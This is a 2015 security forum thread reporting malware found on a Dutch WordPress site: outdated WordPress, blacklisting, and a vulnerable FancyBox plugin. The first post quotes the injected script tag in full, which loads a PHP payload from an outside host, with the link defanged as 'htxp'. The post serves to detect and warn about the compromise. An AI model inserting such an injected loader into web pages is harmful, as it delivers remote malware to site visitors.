Author Topic: Malicious code detected on website!  (Read 1665 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast √úberevangelist
  • Probably Bot
  • *****
  • Posts: 33990
  • malware fighter
Malicious code detected on website!
« on: March 04, 2015, 11:35:34 PM »
Re: http://sitecheck.sucuri.net/results/dekoperenpomp.nl
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.0
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v27
<script type="text/javascript" src="htxp://web175.austin.ispgate.biz/galerie/js/nvwtpvmc.php?id=375996"></script><!--[if lte IE 8]>
Google Safebrowsing Blacklisted: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=dekoperenpomp.nl
Quttera gives only the blacklisting not the malware.
See a tracking report attached. Only for research purposes - do not open links directly in a browser.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast √úberevangelist
  • Probably Bot
  • *****
  • Posts: 33990
  • malware fighter
Re: Malicious code detected on website!
« Reply #1 on: March 04, 2015, 11:39:52 PM »
From the "tracking the trackers" report we found fancy box with version 3.5.1 as vulnerable to attack.
Read: http://www.servertheory.com/?p=606
and from VagoSec: https://vagosec.org/2013/12/wordpress-rce-exploit/

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!